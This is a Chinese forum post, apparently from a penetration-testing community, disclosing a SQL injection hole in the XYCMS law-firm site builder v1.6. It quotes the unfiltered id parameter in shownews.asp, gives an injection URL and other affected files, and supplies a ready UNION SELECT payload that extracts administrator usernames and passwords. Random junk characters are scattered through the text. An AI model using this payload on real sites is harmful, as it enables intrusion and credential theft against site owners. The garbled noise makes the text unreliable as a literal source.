中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似* z. v0 @( W% f
/ @( T4 R, O% s. ]9 C* e' ~
淫荡分割线9 f( o3 @6 V/ r6 r
--------------------------------------------------------  i/ R* L1 x& Y& W% f$ w4 G" R
& p* e( [$ G1 d" }* e1 w2 Q
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)+ R# ]% i( B- h
源码地址:http://down.chinaz.com/soft/29233.htm% V4 a: e- L  y4 D0 J$ [* z8 l
# ^3 u- ~5 H5 \  h* @2 p+ o  [
漏洞文件:shownews.asp* N1 A3 r6 j  X  Q) H
漏洞代码:7-13行7 u0 u5 W1 }( p" z  `# c- G9 {

6 }3 e) d' z, e/ L' K8 V, d
! w& |) l8 d. Z  `( \8 Y  X<% 1 }$ o7 A/ M9 ^  H; U5 T8 b3 ]
id=request.QueryString("id")
& V  I* d( U: `& T6 B; F   
6 v# q; Q5 I0 V% iset snews=server.createobject("adodb.recordset")
7 t  t/ N; f* Y: Yexec="select * from [news] where id="&id
: d; ~0 N9 u  p9 n9 d. ]  tsnews.open exec,conn,1,1. X, b. L: U4 ~( F7 E2 l- \6 ]
%>
! U! r2 R  K5 t/ o ; [. S+ v+ d/ e2 M4 Q7 E
( X4 F8 W# V: K
什么过滤都没有  直造成注入
, o* K% G' ^7 q# e- C$ x0 R 4 A, }4 {2 Y1 X
注入点:http://127.0.0.1:99/shownews.asp?id=xx/ V8 V! Q7 v" p. o
; h  x6 L4 W9 x6 \
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找. N9 ~, k4 K8 @) L

# g! c2 @3 e6 Z( h7 } 8 T7 P8 k% [8 _6 b* }" k3 Q* @
exp: union select 1,admin,password,4,5,7 from admin_user" j2 ^& D, M, A. C) c$ d: C4 k+ D

% K# x. Q& ?& O! r



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2